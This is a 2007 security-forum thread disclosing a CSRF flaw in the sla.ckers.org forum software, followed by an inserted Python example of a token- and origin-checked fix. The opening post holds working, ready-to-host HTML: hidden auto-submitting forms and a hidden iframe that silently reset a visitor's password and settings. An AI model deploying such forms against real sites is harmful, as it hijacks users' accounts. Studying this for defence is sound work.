Sla.ckers.org
Account Hijack
Posted by: eyeced
Date: January 06, 2007 09:47AM

I know this has been mentioned before with the password changing without the need for the old one. I thought (whilst bored) I'd fire up Ethereal and have a look at some of the other things that we could change without the need for user validation. There are quite a lot of privacy options, and I continued to play around with settings for a while until I came up with this.

First html file
----------------------------------------------------------------------------------

<form name="password" method='post' action='http://sla.ckers.org/forum/control.php'>
<input input="text" value="password" name="panel" style="width:0%" /><br />
<input input="text" value="0" name="forum_id" style="width:0%" /><br />
<input input="text" value="newpass" name="password" style="width:0%" /><br />
<input input="text" value="newpass" name="password2" style="width:0%" /><br />
<input type='submit' value='submit' /></form>
<form name="others" method='post' action='http://sla.ckers.org/forum/control.php'>
<input input="text" value="forum" name="panel" style="width:0%" /><br />
<input input="text" value="0" name="forum_id" style="width:0%" /><br />
<input input="text" value="0" name="tz_offset" style="width:0%" /><br />
<input input="text" value="english" name="user_language" style="width:0%" /><br />
<input input="text" value="0" name="threaded_list" style="width:0%" /><br />
<input input="text" value="0" name="threaded_read" style="width:0%" /><br />
<input input="text" value="1" name="email_notify" style="width:0%" /><br />
<input input="text" value="1" name="show_signature" style="width:0%" /><br />
<input input="text" value="1" name="pm_email_notify" style="width:0%" /><br />
<input type='submit' value='submit' /><br />
</form>
<script>
document.password.submit()
document.others.submit()
</script>

----------------------------------------------------------------------------------

Second html file

----------------------------------------------------------------------------------
<body onload="x=document.createElement('iframe');x.src='newpass.html';y=x.style;
y.width='0px';y.left='0';y.height='0px';document.body.appendChild(x);">
----------------------------------------------------------------------------------

Basically you could just host the code of the second html file on your existing web page, and without any user interaction/notification their password for this website would be changed, as well as other settings (cleverly named "others").

I know this has been brought to light before; I just thought I'd explore different ways of exploiting it without user interaction, and find an effective way of exploiting the fact that it was POST.

I thought I'd put it in here rather than CSRF, but it could easily suit both.

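The post above works because control.php trusts the session cookie alone: the browser attaches the cookie to any POST, including one fired from a hidden form on another site. The following is an added example, not code from the thread or from the Phorum software, showing a settings handler with that behaviour next to a hardened one that rejects the forged request with a session-bound CSRF token, an Origin/Referer check and a required old password (the missing old-password check is the point eyeced opens with). The request dicts, the cookie name `phorum_session`, the `USERS` store and the origin `http://attacker.example` are constructed stand-ins; the form field names (`panel`, `forum_id`, `password`, `password2`, `email_notify`) are the ones in the posted forms.

```python
"""Settings endpoint: the thread's cookie-only behaviour beside a CSRF-hardened one.

Added example, not from the thread or from Phorum. Request objects are plain dicts
standing in for a real framework's request.
"""
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "http://sla.ckers.org"        # origin of the forum named in the thread
SERVER_SECRET = secrets.token_bytes(32)     # constructed per-process secret; keep it out of source in practice

# Constructed user store: session id -> account record
USERS = {"sess-abc": {"password": "oldpass", "email_notify": 0}}


def make_csrf_token(session_id: str) -> str:
    """Token bound to the session cookie; the server embeds it as a hidden field in its own forms.
    A page on another origin cannot read it, so a forged form cannot include it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id: str, submitted) -> bool:
    """Constant-time comparison against the token expected for this session."""
    if not isinstance(submitted, str):
        return False
    return hmac.compare_digest(make_csrf_token(session_id), submitted)


def origin_is_allowed(headers: dict) -> bool:
    """Defence in depth: the browser sets Origin/Referer itself; a cross-site form cannot spoof them."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when neither header is present
    parts = urlparse(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def apply_settings(account: dict, form: dict, require_old_password: bool) -> tuple:
    """Apply the 'password' or 'forum' panel from the posted form to the account."""
    if form.get("panel") == "password":
        if require_old_password and form.get("old_password") != account["password"]:
            return 403, "old password required"
        if form.get("password") != form.get("password2"):
            return 400, "passwords do not match"
        account["password"] = form["password"]
        return 200, "password changed"
    if form.get("panel") == "forum":
        account["email_notify"] = int(form.get("email_notify", 0))
        return 200, "settings saved"
    return 400, "unknown panel"


def control_unprotected(request: dict) -> tuple:
    """Mirrors the behaviour described in the thread: the session cookie alone authorises the change."""
    session_id = request["cookies"].get("phorum_session")
    if session_id not in USERS:
        return 401, "not logged in"
    return apply_settings(USERS[session_id], request["form"], require_old_password=False)


def control_hardened(request: dict) -> tuple:
    """Same endpoint with origin check, session-bound token and old-password requirement."""
    session_id = request["cookies"].get("phorum_session")
    if session_id not in USERS:
        return 401, "not logged in"
    if not origin_is_allowed(request["headers"]):
        return 403, "rejected: cross-site origin"
    if not token_is_valid(session_id, request["form"].get("csrf_token")):
        return 403, "rejected: missing or bad CSRF token"
    return apply_settings(USERS[session_id], request["form"], require_old_password=True)


# Constructed: what the hidden iframe's auto-submitted form would send. The browser attaches
# the victim's cookie, but the page cannot read the token and Origin names the attacker's site.
FORGED = {
    "cookies": {"phorum_session": "sess-abc"},
    "headers": {"Origin": "http://attacker.example"},
    "form": {"panel": "password", "forum_id": "0", "password": "newpass", "password2": "newpass"},
}


def legitimate_request() -> dict:
    """A same-site submission carrying the session-bound token and the current password."""
    return {
        "cookies": {"phorum_session": "sess-abc"},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"panel": "password", "old_password": USERS["sess-abc"]["password"],
                 "password": "newpass", "password2": "newpass",
                 "csrf_token": make_csrf_token("sess-abc")},
    }


if __name__ == "__main__":
    print("forged, unprotected:", control_unprotected(FORGED))
    print("forged, hardened:  ", control_hardened(FORGED))
    print("legit, hardened:   ", control_hardened(legitimate_request()))
```

Either the token or the origin check alone defeats the forms in the thread; both are kept because older browsers sent no Origin header and Referer is often stripped, so the origin check is only a backstop for the token. The old-password requirement is a separate control: it limits what a hijacked session (or a stolen cookie) can do even when CSRF is ruled out.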
Re: Account Hijack
Posted by: rsnake
Date: January 09, 2007 10:22AM

Yup, this software sucks. I don't have a lot of time to fix it though. But please remember the very first rule of the forum: http://sla.ckers.org/forum/read.php?1,5

"1) Don't spam/hack the spammers/hackers. Anything that breaks the site, or otherwise annoys me in any way will get you banned or worse depending on my mood. Don't test my patience."

- RSnake
Gotta love it. http://ha.ckers.org

Re: Account Hijack
Posted by: eyeced
Date: January 09, 2007 11:27AM

Maybe MySpace could incorporate that rule to thwart hackers as well then. Yeah, I wasn't trying to 'hack' anyone, I was just showing a PoC of an idea. With some fairly new ideas, exploits are getting more inventive every day; I was just poking about, that's all, seeing what I could do on this site. The imagination wandered...

Re: Account Hijack
Posted by: rsnake
Date: January 09, 2007 11:46AM

It was more of a friendly reminder. I know you weren't doing anything malicious.

- RSnake
Gotta love it. http://ha.ckers.org
